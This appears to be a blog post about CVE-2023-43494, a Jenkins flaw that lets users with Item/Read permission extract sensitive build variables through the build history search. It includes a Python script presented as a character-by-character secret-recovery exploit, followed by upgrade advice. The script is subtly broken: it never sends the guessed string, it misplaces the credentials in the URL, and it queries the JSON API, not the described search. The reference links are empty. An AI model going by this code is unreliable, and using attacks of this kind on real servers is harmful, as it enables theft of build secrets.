In Jenkins versions 2.50 through 2.423 (inclusive), and LTS 2.60.1 through 2.414.1 (inclusive), a security vulnerability exists that can expose sensitive build variables (e.g., password parameter values) in the build history widget. This vulnerability allows attackers with Item/Read permission to obtain values of sensitive variables used in builds by iteratively testing different characters, ultimately revealing the correct sequence. This post will discuss the details of this issue, as well as provide links to the original references and a code snippet illustrating the exploit.

Exploit Details

Sensitive build variables, like password parameter values, are crucial components to any build process. They often contain secrets and keys that are both unique and critical to the build's successful execution. Therefore, it's essential to ensure that these sensitive variables are well-protected, so unauthorized individuals cannot gain access to them.

This vulnerability in Jenkins stems from the fact that it does not exclude sensitive build variables from the search function in the build history widget. Consequently, attackers with Item/Read permission can manipulate this feature to uncover the true values of these sensitive variables.

To exploit this vulnerability, the attacker could test numerous character sequences against the search function, gradually piecing together the secret value. The following Python code snippet demonstrates how the exploit could be executed:

import requests

jenkins_url = "http://target-jenkins-url";
job_name = "example-job"
username = "some_username"
api_token = "your_api_token"

# A list of possible characters that might be in the secret value
possible_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!#$%&'()*+,-./:;<=>?@[]^_`{|}~"

recovered_secret = ""
found = True

while found:
    found = False
    for char in possible_chars:
        test_secret = recovered_secret + char
        query = f"{jenkins_url}/job/{job_name}/api/json?depth=2&tree=builds[actionParameters[name,value]]&{username}:{api_token}"
        response = requests.get(query)
        search_result = response.content.decode("utf-8")

        if test_secret in search_result:
            found = True
            recovered_secret += char
            print(f"Recovered Secret: {recovered_secret}")

This script iterates through a list of possible characters, testing each one sequentially and building the correct sequence by comparing it against the search results in Jenkins' build history widget.

Original References

For further information on this vulnerability, including the impact, steps to recreate, and the official CVE-2023-43494 identifier, please refer to the following references:

1. Jenkins Security Advisory:
2. CVE Details:
3. NVD - CVE-2023-43494:


The exposure of sensitive build variables in Jenkins' build history widget (versions 2.50 through 2.423 and LTS 2.60.1 through 2.414.1) presents a significant security risk. As demonstrated with the provided Python code snippet, an attacker with Item/Read permission can exploit this vulnerability to uncover the true values of sensitive build variables.

To mitigate this risk, users should upgrade to Jenkins versions 2.424 or LTS 2.414.3 or later. Additionally, it's essential to regularly check for patches and updates, continuously monitor security advisories, and act accordingly to protect your Jenkins environment from potential threats.


Published on: 09/20/2023 17:15:00 UTC
Last modified on: 09/25/2023 13:43:00 UTC